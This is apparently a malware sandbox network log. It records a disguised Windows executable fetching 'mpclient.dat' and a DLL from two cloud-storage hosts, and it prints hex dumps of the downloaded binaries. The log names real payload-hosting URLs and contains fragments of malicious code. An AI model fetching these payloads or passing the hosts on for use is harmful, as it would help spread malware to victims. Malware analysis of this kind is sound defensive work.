2025-01-16 12:35:10 UTC	8184	IN	Data Raw: 76 07 ff 15 00 3c 01 00 cc 49 8b c8 e8 3b 06 01 00 0f b6 c3 48 8b 9c 24 a0 00 00 00 48 81 c4 90 00 00 00 5d c3 e8 e6 43 ff ff cc cc cc cc cc cc 48 89 74 24 08 57 48 83 ec 40 49 8b f9 48 8b f1 44 0f b6 4c 24 70 48 8d 4c 24 20 e8 70 00 00 00 44 0f b6 4c 24 70 48 8b d0 4c 8b c7 48 8b ce e8 5c 00 00 00 48 8b 54 24 38 48 83 fa 10 72 35 48 8b 4c 24 20 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 6a 3b 01 00 cc e8 a8 05 01 00 48 8b c6 48 8b 74 24 50 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 80 00 00 00 45 84 c9 41 0f b6 c1 be 5c 00 00 00 49 8b f8 0f 45 f0 48 8b d9 48 8b 42 10 4c 8b c0 48 85 c0 75 0d 48 8b d7 e8 65 a5 ff ff e9 9c 01 00 Data Ascii: v<I;H$H]CHt$WH@IHDL$pHL$ pDL$pHLH\HT$8Hr5HL$ HHHrHIH'H+HHvj;HHt$PH@_H\$Ht$WHEA\IEHHBLHuHe
2025-01-16 12:35:10 UTC	8184	IN	Data Raw: c9 44 2a c1 41 80 c0 30 45 88 01 44 8b c2 85 d2 75 d6 66 0f 6f 05 ee 23 01 00 48 8d 45 35 40 88 7d 90 f3 0f 7f 45 a0 4c 3b c8 74 13 4c 8d 45 35 49 8b d1 4d 2b c1 48 8d 4d 90 e8 f9 23 ff ff 48 8b 55 a8 48 8b 4d a0 48 8b c2 48 2b c1 48 83 f8 01 72 37 48 83 fa 10 48 8d 41 01 48 8d 5d 90 48 89 45 a0 48 0f 43 5d 90 48 8d 15 d1 4b 01 00 48 03 d9 41 b8 01 00 00 00 48 8b cb e8 6a f6 00 00 48 8d 45 90 40 88 7b 01 eb 22 33 c0 48 c7 44 24 20 01 00 00 00 4c 8d 0d a4 4b 01 00 44 0f b6 c0 48 8d 4d 90 8d 50 01 e8 7c 12 ff ff 48 89 7c 24 60 48 89 7c 24 68 0f 10 00 0f 11 44 24 50 0f 10 48 10 0f 11 4c 24 60 48 89 78 10 48 89 70 18 40 88 38 4c 8b 54 24 68 48 8b 54 24 60 49 8b ca 4c 8b 75 c0 48 2b ca 4c 8b 45 c8 4c 3b f1 76 2a 49 8b c0 49 2b c6 48 3b c2 72 1f 49 83 fa 10 4c Data Ascii: DA0EDufo#HE5@}EL;tLE5IM+HM#HUHMHH+Hr7HHAH]HEHC]HKHAHjHE@{"3HD$ LKDHMP\|H\|$`H\|$hD$PHL$`HxHp@8LT$hHT$`ILuH+LEL;vII+H;rIL
2025-01-16 12:35:10 UTC	8184	IN	Data Raw: 8b 09 e8 df d6 00 00 85 c0 78 14 0f 8f 9d 02 00 00 41 3b df 0f 92 c0 84 c0 0f 84 8f 02 00 00 48 8b 84 24 d0 00 00 00 48 89 44 24 28 48 89 74 24 20 4c 8b cf 41 b0 01 49 8b d6 49 8b cc e8 9e fc ff ff 49 8b c6 e9 8d 02 00 00 48 3b f9 75 7f 48 8b 79 10 8b 5f 28 48 83 7f 20 00 75 05 41 3b 1f eb 36 c1 eb 02 89 5c 24 38 45 8b 3f 41 c1 ef 02 44 89 7c 24 3c 44 8b c3 44 3b fb 45 0f 42 c7 49 8b 11 48 8b 4f 20 e8 5b d6 00 00 85 c0 78 14 0f 8f 19 02 00 00 41 3b df 0f 92 c0 84 c0 0f 84 0b 02 00 00 48 8b 84 24 d0 00 00 00 48 89 44 24 28 48 89 74 24 20 4c 8b cf 45 33 c0 49 8b d6 49 8b cc e8 1a fc ff ff 49 8b c6 e9 09 02 00 00 41 8b 1f 49 83 39 00 75 06 41 3b 58 28 eb 37 c1 eb 02 89 5c 24 40 45 8b 68 28 41 c1 ed 02 44 89 6c 24 44 44 8b c3 44 3b eb 45 0f 42 c5 48 8b 57 20 Data Ascii: xA;H$HD$(Ht$ LAIIIH;uHy_(H uA;6\$8E?AD\|$<DD;EBIHO [xA;H$HD$(Ht$ LE3IIIAI9uA;X(7\$@Eh(ADl$DDD;EBHW
2025-01-16 12:35:10 UTC	8184	IN	Data Raw: 89 bc 24 60 01 00 00 48 8b 37 4c 8b ee 48 8b 5e 08 80 7b 19 00 75 63 49 89 6b 18 48 8b 4b 20 8b 7b 28 48 85 c9 75 05 41 3b ff eb 25 c1 ef 02 41 8b ee 81 e5 ff ff ff 3f 44 8b c7 3b ef 49 8b d4 44 0f 42 c5 e8 a5 b6 00 00 85 c0 78 13 7f 09 3b fd 0f 92 c0 84 c0 75 08 48 8b f3 48 8b 1b eb 04 48 8b 5b 10 80 7b 19 00 74 b1 48 8b bc 24 60 01 00 00 48 8b ac 24 70 01 00 00 49 3b f5 74 3d 8b 5e 28 4d 85 e4 75 05 44 3b fb eb 29 48 8b 56 20 41 81 e6 ff ff ff 3f c1 eb 02 45 8b c6 41 3b de 49 8b cc 44 0f 42 c3 e8 42 b6 00 00 85 c0 78 0c 7f 0d 44 3b f3 0f 92 c0 84 c0 74 03 49 8b f5 48 3b 37 48 8b bc 24 78 01 00 00 4c 8b bc 24 30 01 00 00 4c 8b ac 24 38 01 00 00 48 8b 9c 24 68 01 00 00 74 11 48 8d 46 30 48 81 c4 40 01 00 00 41 5e 41 5c 5e c3 33 c0 48 81 c4 40 01 00 00 41 Data Ascii: $`H7LH^{ucIkHK {(HuA;%A?D;IDBx;uHHH[{tH$`H$pI;t=^(MuD;)HV A?EA;IDBBxD;tIH;7H$xL$0L$8H$htHF0H@A^A\^3H@A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	159.75.57.35	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:12 UTC	116	OUT	GET /mpclient.dat HTTP/1.1 Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com Connection: Keep-Alive
2025-01-16 12:35:12 UTC	549	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 334805 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:12 GMT ETag: "8d64d97085f6aa11d1375879095d996c" Last-Modified: Tue, 07 Jan 2025 19:41:28 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 16661970189357130763 x-cos-request-id: Njc4OGZkMDBfYzQyZjlhMWVfM2Q2Y19kOGU3NTky x-cos-server-side-encryption: AES256 x-cos-storage-class: MAZ_STANDARD x-cosindex-replication-status: Complete
2025-01-16 12:35:12 UTC	7655	IN	Data Raw: e8 c0 b9 04 00 c0 b9 04 00 b9 a6 1a 0c 8f 6c c0 cc 70 75 e6 6b c6 7c e3 73 00 13 a5 89 3b d3 2c cd 4e 5f 5a 49 29 26 a3 8d 00 00 00 00 f9 38 c8 4b 39 79 51 a1 6e ba 73 d6 5c 53 5c 80 75 45 65 2a 31 0d 4b fe 82 41 1f 88 85 c8 89 37 da e8 5f e2 9a f3 36 d3 92 5c c1 3b 4d f4 52 1f e5 28 4b d5 ab 69 35 c9 1e 45 ce 71 bc 81 7a 78 a3 af 30 b2 b7 ec d6 12 f3 a9 30 8e 02 b4 dc 3d ea c1 b1 50 a9 43 6e d8 68 f0 bd d9 fb 85 ff 68 b6 7c 17 03 a9 dc e5 fb f3 98 e1 56 7d ef 42 0f 70 2e 1f a6 c6 bc cb 37 54 64 34 af 21 9c bf 80 79 39 05 3c 2c b4 7a d8 8b 4d 93 56 3e 2d 2d be 0d 73 5c f8 ea 08 af 74 87 cb dc 66 f3 71 50 2c f8 17 cf ea f2 f1 88 46 98 0c 46 4e 6f cf 67 38 68 6e 96 12 a9 78 31 2b 5a 4f e8 ff e6 30 ec 6c 6c d1 29 49 dd c9 fb 6d 4a 0c d8 15 bf 34 20 b8 86 38 Data Ascii: lpuk\|s;,N_ZI)&8K9yQns\S\uEe*1KA7_6\;MR(Ki5Eqzx00=PCnhh\|V}Bp.7Td4!y9<,zMV>--s\tfqP,FFNog8hnx1+ZO0ll)ImJ4 8
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: 5e 46 e9 81 a9 46 d2 75 63 2f 43 fb a3 4b d1 39 31 83 bb 50 ac 95 ba 63 d3 fc 2d 21 3d d5 f8 de 74 33 25 c4 02 40 5e 45 1e c5 b0 fe 4c 91 ae c1 66 ff 11 eb fd bd af 4a 2f bd 82 e8 ac 58 01 e4 71 9e 73 e7 c1 51 1d dc 74 85 10 ad d2 7b 85 3b ae bd 6d da f1 0d 6b e0 09 8c 30 f7 f7 91 be 80 7e 80 ff 2b f9 e5 9c 18 f1 c8 4a b5 07 47 ef 9e ba 90 37 28 b0 c2 a8 d9 02 4c 59 86 fe 87 98 37 6d 99 27 94 93 52 9a 90 ad ca ac 8a 0e 85 f7 1b 66 73 b8 48 45 04 bf 83 20 8d e0 21 06 48 31 fb 0f ca 8d 76 12 7c 6a 3b 87 be 3b 9f 3c 01 eb 67 f8 a9 ca 03 a8 09 cb ee e3 27 a1 26 b5 5c 6f 82 e4 0f 9a b1 31 ff 4a 24 81 58 b1 ed dd 93 3a ec e2 a8 1b 81 12 7e a9 bc 95 0b 66 07 e8 c1 cc 51 d8 a1 8a 91 6e 1b 3d 42 4b cf db 2e 5e 90 5b 2b 5e d9 41 ba 48 bb 21 84 4a 17 11 7b ed af de Data Ascii: ^FFuc/CK91Pc-!=t3%@^ELfJ/XqsQt{;mk0~+JG7(LY7m'RfsHE !H1v\|j;;<g'&\o1J$X:~fQn=BK.^[+^AH!J{
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: 0f 8c 57 51 5e a7 02 37 f2 ee d7 a3 c4 61 7d 37 64 66 44 5a 6f 40 f6 94 5a 54 6d e3 ef 0a 57 06 6e 50 9a 58 64 ca f3 11 4b 76 4e 64 4a 6d 15 6b 9f 1a d0 44 65 f7 98 7e 3e 09 5e 5c ab 19 91 91 93 eb 29 3d ca ab 22 14 b9 a0 49 83 00 f0 c1 95 73 8c 56 57 96 48 b0 b7 12 3e 09 e9 d1 1a 93 b6 30 55 34 50 6b 2d fc 7b 59 ad e5 06 21 56 36 53 3e 19 df 83 c7 3c 4d 87 fc f3 ea 76 b4 b0 11 90 8d 7c 86 56 51 6b a5 01 14 3a 59 72 3c 8c 3c ef 1f f4 60 b3 1b 98 cf 34 5d 4f f8 26 da 43 65 b1 09 e7 19 4b e8 0b 8a 84 b8 5f 32 10 dc aa d5 ae d2 1e da 4a 1b 78 9e 56 f1 6d c7 de 5a 0d 04 04 22 5e c7 27 94 6f 99 90 43 f2 1e 2d 06 d0 b4 bc d5 82 e7 1b 78 f8 52 3a d1 5c b7 ea 3b 00 0b 96 40 bb 5b 05 9c 5c 00 5e 73 03 b6 2d dc 8a 90 68 84 1f 91 26 22 c9 07 8b 1f fe d9 ef 78 26 1c Data Ascii: WQ^7a}7dfDZo@ZTmWnPXdKvNdJmkDe~>^\)="IsVWH>0U4Pk-{Y!V6S><Mv\|VQk:Yr<<`4]O&CeK_2JxVmZ"^'oC-xR:\;@[\^s-h&"x&
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: 53 71 9b ce e9 da 18 12 52 5a 57 74 34 13 a9 cc 5e 1b 29 d9 12 b2 36 d8 8a f2 77 7b f2 68 bf 29 7a 71 c2 da 93 27 bc 28 3f cd a8 a7 23 ce b6 93 5d 4d ef df 40 06 30 b4 89 28 33 cc cf b0 fb bc c5 9a 21 2f 4d b3 ee c1 22 3d f8 e9 84 1f 78 9d f7 85 ab a5 2a df da a6 e3 92 8e 3f 9d 5d ed 9a c2 94 2a 94 22 0e 97 4c c1 94 2c 11 76 a0 f4 6e 1f 9e 8f c0 c1 b2 7f 05 ce b5 26 1a be 41 d9 a8 e1 23 68 99 7d d6 34 8c c9 a9 b5 b0 29 d1 c0 74 ef 2f a7 d9 a4 70 48 a0 7f 37 17 da ee c1 6c 65 b1 86 07 ba c0 2b 2d de d2 e4 b8 92 69 b8 db 69 82 87 9d 7c 25 3b 61 41 6b af f8 d9 f4 4f cf eb 13 88 77 39 8f 0a a2 36 28 dd 5d c0 14 48 fd 54 d4 2b 57 2e 07 3f 99 72 83 25 9d c5 30 8c 4e c6 4d 24 c3 6a 15 13 e7 2e 72 64 64 5d 39 47 cd a0 43 35 0d bc 6d f1 28 2d a1 6f eb 6f 15 a7 26 Data Ascii: SqRZWt4^)6w{h)zq'(?#]M@0(3!/M"=x?]"L,vn&A#h}4)t/pH7le+-ii\|%;aAkOw96(]HT+W.?r%0NM$j.rdd]9GC5m(-oo&
2025-01-16 12:35:12 UTC	16368	IN	Data Raw: 28 b6 03 a0 81 97 1f 03 64 94 d2 24 40 dd 04 26 69 e4 43 06 5e 17 c9 f4 78 9b 26 81 dc 77 49 d2 72 ba 4a 23 6f ba f7 a3 4b 1f d8 48 75 f4 d8 23 19 8d e2 42 86 6a 5d 2b a2 8c bd 4d 98 b5 55 d4 eb 6f e7 42 1c 62 8f 7e fd a3 d9 09 92 83 56 2f 0b 99 d1 4b b1 2e 12 bc 10 27 84 37 56 e6 d8 68 2a f0 ac d6 1e 8f 70 a4 9a 72 42 79 b7 cf a5 58 23 1c af 90 be 60 3e ae 8b dd c1 10 c8 c5 58 71 5b fc 80 00 40 25 a2 e8 ca 0b be a9 fa b4 ed 09 e3 46 bd 81 2f a2 0a 27 e1 51 f4 60 68 a1 9e 19 13 7a dd 87 08 01 9d 6e 39 86 5e 30 32 63 d6 ac d7 10 0a 03 61 b5 47 d9 e5 d6 9d 61 43 11 78 fd 8f 9c a5 20 90 af bb ef 62 d5 1f 66 81 53 5c 00 1b 43 e2 70 47 e9 19 89 20 af 41 7e eb 19 f4 58 32 d0 68 5a 66 64 e9 86 9d cc b2 16 65 c9 67 09 5d 1c 13 67 2c a7 15 a1 cb d0 2a 06 cb 4a 4f Data Ascii: (d$@&iC^x&wIrJ#oKHu#Bj]+MUoBb~V/K.'7VhprByX#`>Xq[@%F/'Q`hzn9^02caGaCx bfS\CpG A~X2hZfdeg]g,JO
2025-01-16 12:35:12 UTC	16368	IN	Data Raw: 2a 7e af c2 72 e3 6c 4e f7 71 b4 c1 48 38 ff 9f 5d 8a ee 6e 15 2f 13 bb 6f 8d ba c1 1c 87 40 59 a3 6a 52 3f 88 34 a8 db 7a 78 93 ef 2f bf ac 3f 75 2f 2f fd 89 89 e2 1d bc 63 00 fd 9d d9 85 4f d1 75 96 5d 25 d3 84 94 23 4c ac 53 c2 11 b9 00 ed 57 da 41 01 26 84 1d 79 7e 21 a9 85 71 01 d0 98 69 15 d1 4c c7 2c d9 9f ff 2e d1 b1 d1 76 42 bb f6 6b 63 41 ee 7e 87 31 24 ff c8 11 6c df 92 de ca 95 af ca 37 6d 43 d3 a9 d1 1e 46 4c 03 29 71 8f dc ee 1e f1 37 98 88 5e 0f 33 bb 9c c8 1b 69 84 c1 16 a6 1a 82 5f 09 7d 5c 91 8c 50 f6 ca 97 7b 08 06 fe 2a 32 ea de f1 67 e0 fc 17 ef 2c e6 6e b9 ae 3a a4 7b 5c 6e 11 82 1b 49 79 91 5d 60 b0 76 21 c0 b2 21 25 71 61 b9 97 cc dc 75 d0 13 25 68 9a 2a 9d 07 58 70 bd 2d 7f d9 e0 36 9e 41 2a 7c 9b b1 c7 e6 a3 d4 84 fa d9 b3 f1 37 Data Ascii: ~rlNqH8]n/o@YjR?4zx/?u//cOu]%#LSWA&y~!qiL,.vBkcA~1$l7mCFL)q7^3i_}\P{2g,n:{\nIy]`v!!%qau%hXp-6A\|7
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: 8b 26 b5 63 98 a0 13 27 71 47 b2 b0 60 4b d3 25 e1 cd ec a8 e2 b1 48 8f c3 8c 54 b0 d5 a7 d6 a5 97 4c 4a 0f ec d8 7a 26 ea 1c 09 b6 e9 3a 85 12 81 f5 b5 3e b8 8b 0e d9 df 4c 6b be f7 75 b0 c0 e1 1b e4 75 85 19 5a 79 d2 4d 54 31 1d 30 0e ba fd 24 57 5f bb 8d 7d a1 48 8f 7c 5d 2f 4d d4 48 51 05 d1 59 85 7b d4 f9 51 4c a6 c2 d4 fc 46 77 17 64 de 1f b5 74 ff 95 3f 9b 46 47 da 2a 72 8e ae 54 aa cc 8d 64 dd a3 74 58 e1 18 12 22 3b ac 51 42 ff 0f 3e 31 ca 90 52 43 9e 23 d8 12 4f 18 61 3d b8 8a 55 2c 4d 9c d0 f1 55 ab fa c8 7d 7a 4b f8 78 56 49 c6 54 31 cb 31 9e ed e8 8e e1 fd c3 67 1f 74 e9 6b 63 38 82 c2 03 e2 be 64 29 99 d1 9f e2 58 03 b6 2b df d3 d2 e1 67 53 a3 bf 13 74 b5 7c db ae cb 59 7e 29 de dd 7a bf 70 67 5b ec 89 96 eb ef b0 33 fc f6 9a 82 83 4e 2d 90 Data Ascii: &c'qG`K%HTLJz&:>LkuuZyMT10$W_}H\|]/MHQY{QLFwdt?FG*rTdtX";QB>1RC#Oa=U,MU}zKxVIT11gtkc8d)X+gSt\|Y~)zpg[3N-
2025-01-16 12:35:12 UTC	16368	IN	Data Raw: 1b d0 aa 2e 61 7e 07 c0 2e 7e 2e 5d 05 f4 13 d8 3b 26 30 14 c3 89 a7 43 dc 78 3b 4d 1c e3 af 72 73 ff f5 1b 18 50 85 51 21 aa 02 b2 9a e0 90 71 90 2d 4e 88 14 82 d2 25 20 99 ba 95 55 82 1f cc f4 62 9c 79 ab ad df 00 65 11 01 0d 02 67 97 ca be 33 b4 fa e0 86 f5 80 a8 e0 d5 70 b1 b8 6f 67 07 4f 64 59 36 59 ba a0 62 92 8f 85 e5 bb 52 0f 1b 98 95 d1 2c 4a 3f 89 c7 f6 e8 bb d2 7d 04 00 2d 95 b8 0a 99 ea 2d 9d c2 d2 4c de 37 43 6f a5 c6 bb f9 2f bd 36 88 65 96 96 14 51 c1 16 34 d5 59 f6 ad fd 54 4b e6 63 a8 c3 5f 2a 5c e8 e7 50 9f 90 95 00 27 db fd dc 52 73 15 f1 a4 e7 71 ca 51 c6 51 da d9 66 2b e4 54 8a 1b ea 8f 4c 92 ce 12 ce 04 81 7a ef de 39 5f 5a 71 96 2b dc e6 78 d0 de c5 fe 79 a8 55 fa 62 31 95 3b 30 c5 ca 4b 42 d3 32 2b 15 93 71 cc 2d 8d 19 41 fd a3 7c Data Ascii: .a~.~.];&0Cx;MrsPQ!q-N% Ubyeg3pogOdY6YbR,J?}--L7Co/6eQ4YTKc_*\P'RsqQQf+TLz9_Zq+xyUb1;0KB2+q-A\|
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: 39 91 88 95 6b 99 3b 2d db 4d 9e b4 8d 08 37 9d 3a 87 27 51 d3 80 31 c2 a8 75 71 cf 87 0a fd b6 74 f7 73 84 7d 46 61 38 41 e6 30 5d 8b 8c 76 f7 aa f4 0b 81 35 5c ae b4 3a dd 5f 62 be e3 b2 f6 70 d2 2c 1d cc da 29 e0 31 c6 70 88 7e 66 75 2a 53 7d e3 b5 f9 12 f7 34 f2 ba dc ab d1 5a 55 64 58 54 88 7e 0b 62 a8 23 94 af 2d 9b 05 6f ff d3 16 47 65 bd 5c f3 a9 13 1e 11 96 d7 90 da 20 1a af 91 08 c5 a7 26 ad dd 23 c8 d2 35 48 19 89 59 02 18 54 d5 2d 6d b0 b1 2d 66 63 d3 73 95 cd f3 dc ab 92 5e 68 95 df 06 db 13 2b eb a4 f2 09 1b 8b 13 64 02 63 fc 6d c7 1f 1d 5c c9 ed 73 b5 95 e6 73 5a 3f 94 91 f2 7e 2b a9 49 45 43 3e b3 71 f6 77 80 6c 2a b1 a3 e9 9b 76 bd 09 f8 e4 82 35 00 20 71 32 14 f9 7e dc c7 80 8e f8 78 c9 46 3d 29 d6 43 96 18 a7 e6 94 5b 16 89 c0 32 1a 0d Data Ascii: 9k;-M7:'Q1uqts}Fa8A0]v5\:_bp,)1p~fuS}4ZUdXT~b#-oGe\ &#5HYT-m-fcs^h+dcm\ssZ?~+IEC>qwlv5 q2~xF=)C[2
2025-01-16 12:35:12 UTC	8184	IN	Data Raw: c7 17 54 37 96 d8 a6 a7 fa ab a7 06 7c 45 d4 1d 0c ab 54 f8 ab c8 ec 1c 91 3e 37 98 b5 06 83 e9 e7 7e 87 c4 76 77 06 2c 9b e5 c2 d5 b3 bf 2a 2b d0 db c7 78 8c 05 83 05 f3 c9 e6 aa e2 d7 3b 90 03 3f c9 60 57 b8 56 38 48 49 4d 1d e5 10 30 93 ae 7a 4d 9b 61 11 e7 88 2d f2 bc 0a 7d b3 81 16 ba 64 cd 74 f3 33 5b 99 4d dc c1 be b8 7f b8 27 49 3a 99 e4 ae 59 73 bc 4a dd 8c a3 9b 65 fd 43 01 27 e9 8b 40 07 0a b1 21 c6 f7 da c2 b9 8a 51 6e f7 83 08 b4 e3 ab 31 e1 2d d8 d3 ec ba 2e 3f 91 d3 c0 f2 33 54 fd 35 86 39 71 5f cb 4e bd 5c c5 86 2d 4a 95 ae f0 ac 0d 3b 1e 42 37 78 9d ef cc 7e ef 79 a6 4f fe 2f b4 26 a4 75 cf 53 6d 41 cd 11 48 35 5f e0 bd 68 80 9f e9 4a b8 8c f6 9c b3 3a 59 08 62 25 08 00 9e 22 e0 59 1f 04 98 be d7 a7 51 1b ac fb 4c b4 6c fc b7 cd 7a 51 a5 Data Ascii: T7\|ET>7~vw,*+x;?`WV8HIM0zMa-}dt3[M'I:YsJeC'@!Qn1-.?3T59q_N\-J;B7x~yO/&uSmAH5_hJ:Yb%"YQLlzQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49728	183.66.100.45	443	3160	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:35:14 UTC	96	OUT	GET /openvr_api.dll HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
2025-01-16 12:35:14 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 379904 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:35:14 GMT ETag: "366710963f426b54b6e06657b26a5cbb" Last-Modified: Tue, 14 Jan 2025 12:37:01 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 5056899690438975135 x-cos-request-id: Njc4OGZkMDJfYTQxMTNmMGJfMmI0MF9mNDBjZDNk x-cos-server-side-encryption: AES256
2025-01-16 12:35:14 UTC	15912	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0a 20 e7 f6 4e 41 89 a5 4e 41 89 a5 4e 41 89 a5 3c c0 8c a4 c0 41 89 a5 3c c0 8d a4 42 41 89 a5 3c c0 8a a4 46 41 89 a5 5e c5 8a a4 47 41 89 a5 5e c5 8d a4 40 41 89 a5 5e c5 8c a4 6b 41 89 a5 3c c0 88 a4 4b 41 89 a5 4e 41 88 a5 28 41 89 a5 05 c4 80 a4 4f 41 89 a5 05 c4 89 a4 4f 41 89 a5 05 c4 76 a5 4f 41 89 a5 05 c4 8b a4 4f 41 89 a5 52 69 63 68 4e 41 89 a5 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ NANANA<A<BA<FA^GA^@A^kA<KANA(AOAOAvOAOARichNA
2025-01-16 12:35:14 UTC	16384	IN	Data Raw: 30 e8 72 30 00 00 90 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 48 8b 44 24 70 8b 40 0c 89 44 24 2c 48 8b 54 24 68 48 8b 4c 24 70 e8 7d 0f 00 00 89 44 24 28 48 8b 44 24 78 48 8b 4c 24 60 48 8b 09 48 89 08 8b 44 24 2c 89 44 24 24 eb 0a 8b 44 24 24 ff c8 89 44 24 24 83 7c 24 24 00 0f 86 fe 00 00 00 48 8b 44 24 70 48 63 40 10 48 8b 4c 24 68 48 8b 49 08 48 03 c8 48 8b c1 8b 4c 24 24 ff c9 8b c9 48 6b c9 14 48 03 c1 48 89 44 24 30 48 8b 44 24 30 8b 40 04 39 44 24 28 0f 8e bb 00 00 00 48 8b 44 24 30 8b 40 08 39 44 24 28 0f 8f a9 00 00 00 45 33 c0 48 8d 54 24 40 48 8b 44 24 68 48 8b 08 ff 15 54 f5 03 00 8b 00 48 89 44 24 48 48 8b 44 24 30 48 63 40 10 48 8b 4c 24 40 48 03 c8 48 8b c1 Data Ascii: 0r0HHLL$ LD$HT$HL$HXHD$p@D$,HT$hHL$p}D$(HD$xHL$`HHD$,D$$D$$D$$\|$$HD$pHc@HL$hHIHHL$$HkHHD$0HD$0@9D$(HD$0@9D$(E3HT$@HD$hHTHD$HHD$0Hc@HL$@HH
2025-01-16 12:35:14 UTC	16384	IN	Data Raw: 24 d4 03 00 48 8d 0d 95 d3 03 00 e8 c8 7f 01 00 b8 ff ff ff ff e9 29 01 00 00 48 83 bc 24 b0 00 00 00 00 74 0a c7 44 24 38 01 00 00 00 eb 08 c7 44 24 38 00 00 00 00 8b 44 24 38 89 44 24 3c 83 7c 24 3c 00 75 3a 48 8d 05 fb d3 03 00 48 89 44 24 28 48 8d 05 a7 b9 03 00 48 89 44 24 20 45 33 c9 41 b8 23 00 00 00 48 8d 15 5a d3 03 00 b9 02 00 00 00 e8 30 79 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 3c 00 75 5e 48 8b 8c 24 b8 00 00 00 e8 94 79 00 00 48 89 44 24 48 ba 16 00 00 00 48 8b 4c 24 48 e8 e0 88 00 00 48 8b 84 24 b8 00 00 00 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 23 00 00 00 4c 8d 05 fd d2 03 00 48 8d 15 56 d3 03 00 48 8d 0d 6f d3 03 00 e8 fa 7e 01 00 b8 ff ff ff ff eb 5e 48 8d 84 24 c0 00 00 00 48 89 44 24 28 48 8d 84 24 b0 00 00 00 48 89 44 24 20 Data Ascii: $H)H$tD$8D$8D$8D$<\|$<u:HHD$(HHD$ E3A#HZ0yu3\|$<u^H$yHD$HHL$HH$HD$(HD$ A#LHVHo~^H$HD$(H$HD$
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: 0a 00 00 4c 8d 05 ee 95 03 00 48 8d 15 f7 a5 03 00 48 8d 0d 20 9f 03 00 e8 bb 3f 01 00 32 c0 e9 df 01 00 00 0f b6 44 24 30 85 c0 75 07 32 c0 e9 cf 01 00 00 48 8b 8c 24 90 00 00 00 e8 97 49 00 00 0f b6 c0 85 c0 75 07 b0 01 e9 b4 01 00 00 48 c7 44 24 48 00 00 00 00 ba 10 00 00 00 48 8b 8c 24 90 00 00 00 e8 4e 3a 00 00 0f b6 c0 85 c0 74 29 48 83 7c 24 38 00 7d 21 48 8b 44 24 38 48 f7 d8 48 89 44 24 48 ba 40 00 00 00 48 8b 8c 24 90 00 00 00 e8 20 49 00 00 eb 0a 48 8b 44 24 38 48 89 44 24 48 48 8b 84 24 90 00 00 00 83 78 30 00 7d 11 48 8b 84 24 90 00 00 00 c7 40 30 01 00 00 00 eb 48 ba 08 00 00 00 48 8b 8c 24 90 00 00 00 e8 a3 91 00 00 48 8b 84 24 90 00 00 00 48 83 c0 50 48 89 44 24 70 48 8b 84 24 90 00 00 00 48 63 40 30 48 8b 8c 24 90 00 00 00 4c 8b 41 08 48 Data Ascii: LHH ?2D$0u2H$IuHD$HH$N:t)H\|$8}!HD$8HHD$H@H$ IHD$8HD$HH$x0}H$@0HH$H$HPHD$pH$Hc@0H$LAH
2025-01-16 12:35:15 UTC	16384	IN	Data Raw: c0 74 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 40 83 7c 24 40 00 75 3a 48 8d 05 3d 56 03 00 48 89 44 24 28 48 8d 05 c9 39 03 00 48 89 44 24 20 45 33 c9 41 b8 9a 06 00 00 48 8d 15 ac 55 03 00 b9 02 00 00 00 e8 52 f9 00 00 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 63 48 8b 44 24 70 48 8b 48 08 e8 b5 f9 ff ff 48 89 44 24 58 ba 16 00 00 00 48 8b 4c 24 58 e8 01 09 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 9a 06 00 00 4c 8d 05 4d 55 03 00 48 8d 15 06 56 03 00 48 8d 0d af 55 03 00 e8 1a ff 00 00 b8 ff ff ff ff e9 ed 00 00 00 c6 44 24 30 00 48 8b 44 24 70 0f b6 40 24 89 44 24 44 83 7c 24 44 07 0f 87 96 00 00 00 48 63 44 24 44 48 8d 0d e7 f4 fe ff 8b 84 81 e4 0b 01 00 48 03 c1 ff e0 48 8b Data Ascii: tD$<D$<D$<D$@\|$@u:H=VHD$(H9HD$ 